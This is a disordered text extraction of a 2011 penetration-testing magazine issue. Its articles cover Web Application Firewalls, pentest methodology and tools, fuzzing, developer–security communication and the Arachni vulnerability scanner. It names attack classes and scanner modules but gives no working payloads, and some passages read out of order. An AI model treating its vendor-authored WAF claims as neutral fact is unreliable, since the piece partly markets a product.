Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
